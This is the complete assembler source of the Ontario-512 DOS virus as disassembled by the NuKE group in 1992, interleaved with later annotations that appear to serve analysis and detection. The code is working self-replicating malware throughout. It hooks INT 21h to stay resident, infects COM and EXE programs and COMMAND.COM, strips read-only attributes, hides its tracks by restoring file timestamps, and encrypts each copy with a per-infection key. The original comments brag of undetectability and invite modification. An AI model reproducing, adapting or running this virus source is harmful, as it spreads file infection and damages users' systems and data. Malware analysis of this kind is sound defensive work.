
  1. ;*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* 
  2. ;-*                        Ontario-512 Virus                          *- 
  3. ;*-                       ~~~~~~~~~~~~~~~~~~~                         -* 
  4. ;-*  Disassembly by: Rock Steady/NuKE                                 *-
  5. ;*-  ~~~~~~~~~~~~~~~~                                                 -* 
  6. ;-*  Notes: Resident EXE and COM infector, will infect COMMAND.COM    *- 
  7. ;*-  ~~~~~~ on execution. 512 bytes file increase, memory decrease    -* 
  8. ;-*         of about 2,048 bytes. Anti-debugging, encrypted virus.    *- 
  9. ;*-                                                                   -* 
  10. ;-* (c) Copy-Ya-Rite [NuKE] Viral Development Labs '92                *- 
  11. ;*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* 
  12. virus       segment byte public
      ; Single 16-bit real-mode code segment, MASM/Intel syntax, DOS.
      ; The carrier is assembled as a .COM image (org 100h); in an infected
      ; host the same bytes run at a different offset, which is why the
      ; code below derives its own base in BP instead of trusting these
      ; assembly-time offsets.
  13.             assume  cs:virus, ds:virus
  14.
  15.             org     100h                    ;Guess its a COM File huh?
  16. ont         proc    far
      ; Entry point of the carrier (and, after infection, of a host).
      ; The JMP skips the carrier's own body: print the 'fected [NuKE]'92'
      ; text via AH=09h and exit with INT 20h. DS:DX=102h points at the
      ; bytes right after the jump; the exact start of the printed text
      ; depends on how the assembler encodes the jump.
      ; The 'db 1Dh' between the jump and the text is a loose byte whose
      ; role cannot be recovered from this listing.
  17.
  18. start:
  19.             jmp     go4it                   ;Jump to beginning of the
  20.             db      1Dh                     ;Virus And start!
  21.             db      'fected [NuKE]''92', 0Dh, 0Ah, '$'
  22.             mov     dx,0102h        ;This is the small File the Virus
  23.             mov     ah,09h          ;is infected to! As you see it only
  24.             int     21h             ;displays that messages and exits
  25.             int     20h             ;Exit Command for COMs
  26. go4it:
  27.             nop
  28.             call    decrypt         ;Get Decryption value & Decrypt viri
  29.             call    virus_start     ;Start the Virus!
      ; Both calls double as position probes: decrypt pops its return
      ; address to find the first byte to XOR (and pushes it back, so it
      ; returns here normally); virus_start pops its return address to set
      ; BP and never returns here - it ends in a RETN to CS:100h (COM host)
      ; or in the far JMP placed after its ENDP (EXE host).
  30. ont         endp
  31.                                                                          
  32. ;---------------------------------------------------------------------;  
  33. ;                   The Start of the Virus Code                       ;  
  34. ;---------------------------------------------------------------------;  
  35.                                                                          
  36. virus_start           proc    near
      ; Runs at every execution of an infected host.
      ; Entered by CALL, so the word on the stack is the offset of the
      ; 'call virus_start' instruction; BP = that offset - 7 is then used as
      ; the base of the virus image for every cs:[..][bp] reference below
      ; (the -7 is tied to the original binary layout and cannot be
      ; re-derived from this listing).
      ; Register roles while installing: DS:BX = original INT 21h vector,
      ; AX = segment of the resident copy, ES = PSP on entry (DOS convention).
  37.             pop     bp
  38.             sub     bp,7
  39.             mov     ax,0FFFFh             ;Is Virus in Memory hooked on?
  40.             int     21h                     ;the Int 21h?
  41.             or      ah,ah                   ;
  42.             jz      bye_bye                 ;Yes it is... Quit then...
      ; "Are you there" probe: the resident handler answers AX=FFFFh with
      ; AX=0 (INC AX / IRET right after this proc). A zero AH back from
      ; AX=FFFFh / INT 21h is therefore a usable indicator that this virus
      ; is resident.
  43.             push    ds
  44.             xor     ax,ax
  45.             mov     ds,ax                   ; DS = 0: IVT / BIOS data area
  46.             sub     word ptr ds:413h,2      ; 0040:0013h BIOS memory size (KB) -= 2
  47.             lds     bx,dword ptr ds:84h     ; DS:BX = current INT 21h vector (0000:0084h)
  48.             mov     word ptr cs:[200h][bp],bx   ; saved at image+200h (offset)
  49.             mov     word ptr cs:[202h][bp],ds   ; and image+202h (segment)
  50.             mov     bx,es                   ; ES = PSP; the MCB sits one paragraph below it
  51.             dec     bx
  52.             mov     ds,bx
  53.             sub     word ptr ds:3,80h       ; MCB size (paragraphs) -= 80h, i.e. 2 KB
  54.             mov     ax,ds:12h               ; MCB+12h = PSP:0002h, the top-of-memory segment
  55.             sub     ax,80h                  ; lower it by 2 KB; that slice at the top of the
  56.             mov     ds:12h,ax               ; host's block becomes the resident segment
  57.             mov     es,ax
  58.             push    cs
  59.             pop     ds
  60.             mov     si,bp                   ; copy image base .. base+203h (code + saved
  61.             xor     di,di                   ; vector) to resident:0000
  62.             mov     cx,204h
  63.             cld
  64.             rep     movsb
  65.             mov     ds,cx                   ; CX is 0 after REP MOVSB: DS = IVT
  66.             cli                             ;This is where we hook the
  67.             mov     word ptr ds:84h,7Fh     ;virus to the Int21h
  68.             mov     word ptr ds:84h+2,ax    ; vector -> resident:007Fh (the CMP AX,0FFFFh after this proc)
  69.             sti
  70.             mov     ax,4BFFh                ; not a DOS function: the handler just installed
  71.             int     21h                     ; treats AL=FFh as "infect the path at 1DDh" (C:\COMMAND.COM)
  72.             pop     ds                      ; host's DS back, and ES = DS
  73.             push    ds
  74.             pop     es
      ; Defender indicators from the above: INT 21h vector with offset 007Fh
      ; in a segment just below the host's top of memory, 0040:0013h two KB
      ; short of installed RAM, and COMMAND.COM modified at program start.
  75. bye_bye:
      ; Hand control to the host. BP = 0 selects the EXE path at 'what'.
      ; Otherwise the host is a COM file: its original first 4 bytes were
      ; stashed at image+7Bh by infect and are copied back to CS:100h, then
      ; RETN onto them (DI=100h was pushed as the return address).
  76.             or      bp,bp
  77.             jz      what
  78.             lea     si,[bp+7Bh]
  79.             nop
  80.             mov     di,offset ds:[100h]
  81.             push    di
  82.             cld
  83.             movsw
  84.             movsw
  85.             retn
  86. what:
      ; EXE host: image+7Bh/7Dh hold the host's original entry IP and CS
      ; (CS already +10h for the PSP, see infect); add the load segment
      ; taken from ES and fall into the hand-encoded far JMP after ENDP.
      ; cs:7dh is not BP-relative, consistent with BP = 0 on this path;
      ; presumably the IP=1 entry that infect writes into the EXE header is
      ; what makes BP come out as 0 - not verifiable from the listing.
  87.             mov     ax,es
  88.             add     cs:7dh,ax
  89. ;*          jmp     far ptr go4it7
  90. virus_start           endp
  91.             db      0EAh,0EBh, 15h, 49h, 6Eh
      ; Hand-encoded far JMP (opcode EAh + offset word + segment word); the
      ; EXE return path in virus_start falls into it. Going by the stores to
      ; ds:7bh / ds:7dh in infect, the two operand words live at image+7Bh
      ; and image+7Dh and hold the host's original entry point, so the
      ; 0EBh,15h,49h,6Eh seen here are just the carrier's values.
      ; The CMP below is image+7Fh, the address the INT 21h vector is
      ; pointed at: this is the resident handler's entry.
  92.             cmp     ax,0FFFFh               ; "are you there" probe from virus_start
  93.             jne     new_21h
  94.             inc     ax                      ; reply AX = 0
  95.             iret
  96. ;---------------------------------------------------------------------;
  97. ;                     Interrupt 21h handler                           ;
  98. ;---------------------------------------------------------------------;
  99. new_21h:
      ; Only AH=4Bh (EXEC) is intercepted; everything else is passed
      ; through untouched. AL=3 (load overlay) is skipped. AL=FFh is not a
      ; DOS subfunction: it is the virus's own request, issued once at
      ; install time, to infect the ASCIIZ path at CS:1DDh (C:\COMMAND.COM);
      ; that branch IRETs without ever reaching DOS and leaves DS = CS for
      ; its caller. Any other EXEC infects the program at DS:DX first, then
      ; chains to the saved original vector, so the program still runs.
  100.            cmp     ah,4Bh        ;Test, is File beginning Executed!
  101.            jne     leave_ok      ;Nope! Call Int21!
  102.            cmp     al,3          ;Overlay, beginning execute?
  103.            je      leave_ok      ;Yes! Leave it alone
  104.            cmp     al,0FFh       ;Virus testing to see if its alive?
  105.            jne     do_it_man     ;in memory?
  106.            push    cs
  107.            pop     ds
  108.            mov     dx,1DDh
  109.            call    infect
  110.            iret
  111. do_it_man:
  112.            call    infect       ;Infect file dude...
  113. leave_ok:
      ; far jump through the original INT 21h vector saved at image+200h
  114.            jmp     dword ptr cs:[200h]  ;Int21 handler..
  115.                                                                          
  116. ;---------------------------------------------------------------------;  
  117. ;              Infection Routine for the Ontario Virus                ;  
  118. ;---------------------------------------------------------------------;  
  119.                                                                          
  120. infect     proc    near
      ; Infect the file whose ASCIIZ path is at DS:DX (the EXEC caller's
      ; registers, or DS=CS / DX=1DDh for COMMAND.COM).
      ; All general registers plus DS/ES are saved here and restored at
      ; go4it5. Carry from the DOS calls (made via int21, which bypasses
      ; the hooked vector) is the only error signal; errors go to go4it4
      ; (restore stamp, close) or go4it5 (plain exit).
      ; Scratch layout in the resident segment, past the 200h-byte image:
      ;   204h/206h   file time/date        208h..222h  first 1Bh bytes
      ;   224h..423h  copy of the image, encrypted before being written
      ; Host type is decided by the first word: 5A4Dh ('MZ') = EXE, else COM.
      ; Infection markers a scanner can key on:
      ;   COM: byte 3 equals the low byte of the JMP displacement at byte 1
      ;   EXE: header initial IP (file offset 14h, buffered at 21Ch) == 1
      ; Observable side effects: a read-only attribute is cleared and never
      ; restored; time/date are restored; the file grows by exactly 200h
      ; bytes (COM: appended at EOF; EXE: written at e_cp*200h, see go4it2).
  121.            push    es
  122.            push    ds              ;Save them not to fuck things up..
  123.            push    dx
  124.            push    cx
  125.            push    bx
  126.            push    ax
  127.            mov     ax,4300h        ;Here we get the file attribute
  128.            call    int21           ;for file to be infected.
  129.            jc      outta           ;Bitch Error encountered. Quit!
  130.            test    cl,1            ;Test if its Read-Only!
  131.            jz      attrib_ok       ;Ok, it ain't Read-Only Continue!
  132.            and     cl,0FEh         ;Set Read-Only to normal Attribs
  133.            mov     ax,4301h        ;Call Ints to do it...
  134.            call    int21           ;Bingo! Done!
  135.            jc      outta           ;Error encountered? Split if yes!
  136. attrib_ok:
  137.            mov     ax,3D02h        ;Open file for Read/Write
  138.            call    int21           ;Call Interrupt to do it!
  139.            jnc     open_ok         ;no errors? Continue!
  140. outta:
  141.            jmp     go4it5          ;Hey, Split Man... Errors happened!
  142. open_ok:
  143.            mov     bx,ax           ;BX=File Handle
  144.            push    cs
  145.            pop     ds              ; DS = resident segment from here on
  146.            mov     ax,5700h        ;Get File's Date & Time
  147.            call    int21           ;Do it!
  148.            mov     word ptr ds:[204h],cx  ;Save Time
  149.            mov     word ptr ds:[206h],dx  ;Save Date
  150.            mov     dx,208h         ;DX=Pointer
  151.            mov     cx,1Bh          ;CX=Number of Btyes
  152.            mov     ah,3Fh          ;Read From File
  153.            call    int21           ;Do It!
  154.            jc      go4it1          ;Errors? Quit if yes!
      ; 5A4Dh = 'MZ': this is the EXE-vs-COM split, not an infection check;
      ; the already-infected tests are the 20Bh compare below (COM) and
      ; the 21Ch compare at go4it0 (EXE).
  155.            cmp     word ptr ds:[208h],5A4Dh ;Check if files already
  156.            je      go4it0                   ;infected.
  157.            mov     al,byte ptr ds:[209h]   ;Com , Exes...
  158.            cmp     al,byte ptr ds:[20Bh]   ; COM marker present -> already infected
  159.            je      go4it1
  160.            xor     dx,dx
  161.            xor     cx,cx
  162.            mov     ax,4202h
  163.            call    int21           ;Move File pointer to end of
  164.            jc      go4it1          ;file to be infected.
  165.            cmp     ax,0E000h       ;File bigger than E000 bytes?
  166.            ja      go4it1          ;Error...
      ; AX = file length (low word). The host's original first 4 bytes are
      ; parked at image+7Bh (the same 4-byte slot that holds the EXE far
      ; jump operands), then the buffered header is turned into
      ; 'E9 <len-3>': a JMP rel16 at offset 0 whose displacement is measured
      ; from offset 3 lands exactly on the appended image. The low
      ; displacement byte is duplicated at offset 3 as the infection marker.
  167.            push    ax              ;Save File Length
  168.            mov     ax,word ptr ds:[208h]
  169.            mov     ds:7bh,ax
  170.            mov     ax,word ptr ds:[20Ah]
  171.            mov     ds:7dh,ax
  172.            pop     ax                       ;All this is, is a complex
  173.            sub     ax,3                     ;way to do "JMP"
  174.            mov     byte ptr ds:[208h],0E9h  ;
  175.            mov     word ptr ds:[209h],ax
  176.            mov     byte ptr ds:[20Bh],al
  177.            jmp     short go4it3             ;File READY Infect it!
  178.            db      90h                      ;NOP me... detection string?
  179. go4it0:
      ; EXE: initial IP == 1 is the marker written at go4it2 -> already done
  180.            cmp     word ptr ds:[21Ch],1
  181.            jne     go4it2
  182. go4it1:
  183.            jmp     go4it4
  184. go4it2:
      ; EXE header rewrite (offsets into the 208h buffer: 20Ch = e_cp pages,
      ; 210h = e_cparhdr, 21Ch = e_ip, 21Eh = e_cs).
  185.            mov     ax,word ptr ds:[20Ch]   ; pages in file
  186.            mov     cx,200h
  187.            mul     cx                      ; DX:AX = pages*200h = where the image is written
  188.            push    ax                      ; (kept as the seek position; the partial-page
  189.            push    dx                      ;  count at 20Eh is not consulted)
  190.            mov     cl,4
  191.            ror     dx,cl                   ; (DX:AX) >> 4 = paragraphs; exact only while
  192.            shr     ax,cl                   ; DX < 10h, i.e. files under 1 MB, which is all
  193.            add     ax,dx                   ; real-mode DOS loads anyway
  194.            sub     ax,word ptr ds:[210h]   ; minus header paragraphs: image CS relative to load segment
  195.            push    ax
  196.            mov     ax,word ptr ds:[21Ch]   ; original e_ip -> image+7Bh
  197.            mov     ds:7bh,ax
  198.            mov     ax,word ptr ds:[21Eh]   ; original e_cs + 10h (PSP paragraphs) -> image+7Dh;
  199.            add     ax,10h                  ; virus_start adds the PSP segment at run time
  200.            mov     ds:7dh,ax
  201.            pop     ax                      ; This is continues with the
  202.            mov     word ptr ds:[21Eh],ax   ; above to put a JMP at the
  203.            mov     word ptr ds:[21Ch],1    ; beginning of the file!
  204.            inc     word ptr ds:[20Ch]      ; new entry CS = computed paragraph, IP = 1 (also the marker), e_cp += 1
  205.            pop     cx                      ; CX:DX = pages*200h pushed above
  206.            pop     dx                      ;
  207.            mov     ax,4200h                ; seek there from start of file
  208.            call    int21
  209.            jc      go4it4
  210. go4it3:
      ; Self-modification: flips bit 3 of one byte of the resident image
      ; (image+1F8h, apparently inside the decrypt routine by position) on
      ; every infection, so generations differ in that byte. Which
      ; instruction it hits cannot be confirmed from this listing.
  211.            xor     byte ptr ds:[1F8h],8   ;
  212.            xor     ax,ax                  ; Theses Lines copy the
  213.            mov     ds,ax                  ; virus code else where
  214.            mov     al,ds:46Ch             ; in memory to get it
      ; DS = 0: 0040:006Ch is the BIOS timer tick count; its low byte is
      ; this infection's XOR key. It is stored at image+1ECh (the byte the
      ; decryptor reads) and stays in AL for encrypt_decrypt below.
  215.            push    cs                     ; ready to infect the file
  216.            pop     ds                     ; as we must encrypt it
  217.            push    cs                     ; FIRST when we infect the
  218.            pop     es                     ; file. so we'll encrypt
  219.            mov     byte ptr ds:[1ECh],al  ; this copy we're making!
  220.            xor     si,si                  ; and append that to the
  221.            mov     di,offset ds:[224h]    ; end of the file
  222.            push    di                     ;
  223.            mov     cx,200h                ; image CS:0..1FFh -> CS:224h
  224.            cld                            ;
  225.            rep     movsb
      ; SI = 228h = copy+4: the copy is encrypted from its 5th byte for
      ; 1E8h bytes, so the entry jump and the tail (key byte, decryptor)
      ; stay in clear in every infected file - that plaintext tail is
      ; constant across generations.
  226.            mov     si,offset ds:[228h]    ;Now Encrpyt that copy of the
  227.            call    encrypt_decrypt        ;virus we just made...
  228.            pop     dx                     ; DX = 224h, the encrypted copy
  229.            mov     cx,200h                ;Write Virus to file!
  230.            mov     ah,40h                 ;BX=Handle, CX=Bytes
  231.            call    int21                  ;DX=pointer to write buffer
  232.            jc      go4it4            ;Duh? Check for errors!
  233.            xor     cx,cx
  234.            xor     dx,dx                  ;Now move pointer to beginning
  235.            mov     ax,4200h               ;of file.
  236.            call    int21
  237.            jc      go4it4            ;Duh? Check for errors!
  238.            mov     dx,208h                ;Write to file!
  239.            mov     cx,1Bh                 ;CX=Bytes
  240.            mov     ah,40h                 ;DX=pointes to buffer
  241.            call    int21             ;Bah, HumBug
  242. go4it4:
      ; restore the time/date stamp read at open_ok, then close the handle
  243.            mov     dx,word ptr ds:[206h]  ;Leave no tracks...
  244.            mov     cx,word ptr ds:[204h]  ; puts back File TIME
  245.            mov     ax,5701h               ; and DATE! on file...
  246.            call    int21                  ;
  247.            mov     ah,3Eh                 ;
  248.            call    int21             ;Bah, HumBug...
  249. go4it5:
  250.            pop     ax                     ;Get lost...
  251.            pop     bx
  252.            pop     cx
  253.            pop     dx
  254.            pop     ds
  255.            pop     es
  256.            retn
  257. infect     endp
  258.                                                                          
  259. ;----------------------------------------------------------------------; 
  260. ;                 The Original Interrupt 21h handler                   ; 
  261. ;----------------------------------------------------------------------; 
  262.                                                                          
  263. int21      proc    near
      ; Issue a DOS call from inside the handler. PUSHF followed by a far
      ; CALL through the original vector saved at image+200h builds the same
      ; stack frame (flags, CS, IP) an INT would, so DOS returns with IRET.
      ; Because it targets the saved vector and not INT 21h, the virus's
      ; own file operations never pass back through new_21h.
  264.            pushf                       ;Fake an Int Call...
  265.
  266.            call    dword ptr cs:[200h] ;Orignal Int21h Handler
  267.            retn
  268. int21      endp
  269.                                                                          
  270.            db      'C:\COMMAND.COM'
  271.            db       00h, 84h
      ; ASCIIZ path the handler's AL=FFh branch passes to infect as DS:DX
      ; with DX = 1DDh. Counting from 1DDh, the 00h terminator lands at
      ; 1EBh and the 84h at 1ECh - the slot infect overwrites with the
      ; per-infection key - so 84h is the key value this carrier was built
      ; with, not part of the path.
  272.                                                                          
  273. ;---------------------------------------------------------------------;  
  274. ;            The Simple, But VERY Effective Encryption Routine        ;  
  275. ;---------------------------------------------------------------------;  
  276.                                                                          
  277. decrypt    proc    near
      ; Two entry points sharing one loop:
      ;  decrypt         - run-time entry from the carrier/host. SI = return
      ;                    address (popped, then pushed back so RETN still
      ;                    works) = first byte to process; AL = key byte at
      ;                    [1E8h+SI]. If SI is image+4, as the encrypt-side
      ;                    call (SI = 228h = copy+4) implies, that is the
      ;                    byte at image+1ECh which infect fills in.
      ;  encrypt_decrypt - called by infect with SI = 228h and AL = the
      ;                    fresh key.
      ; Each of the 1E8h iterations complements AL before the XOR, so the
      ; bytes alternate between ~key and key: a 2-byte repeating XOR
      ; stream, symmetric, so one routine both encrypts and decrypts.
      ; Defender note: this loop and the key byte are stored in clear in
      ; every infected file, so the decryptor stub is a stable signature
      ; whatever the key is; the 'UNDETECTABLE' claim in the original
      ; comments does not hold.
  278.            pop     si
  279.            push    si
  280.            mov     al,byte ptr cs:[1E8h][si];INCRYPTION VALUE TO CHANGE!
  281. encrypt_decrypt:                         ;and Virus will be UNDETECTABLE
  282.            mov     cx,1E8h            ; LENGTH OF VIRII! Change this!
  283. loop_me:   not     al                 ; if you modief the virus!
  284.            xor     cs:[si],al         ;
  285.            inc     si                 ;
  286.            loop    loop_me            ;
  287.                                       ;
  288.            retn
  289. decrypt    endp
  290.                                                                          
  291.                                                                          
  292. virus      ends
  293.            end     start                   ; carrier entry point: 'start' (the JMP over the stub)
  294.                                                                          
  295. ;------------------------------------------------------------------------
  296.  
  297.  
  298. Downloaded From P-80 International Information Systems 304-744-2253
  299.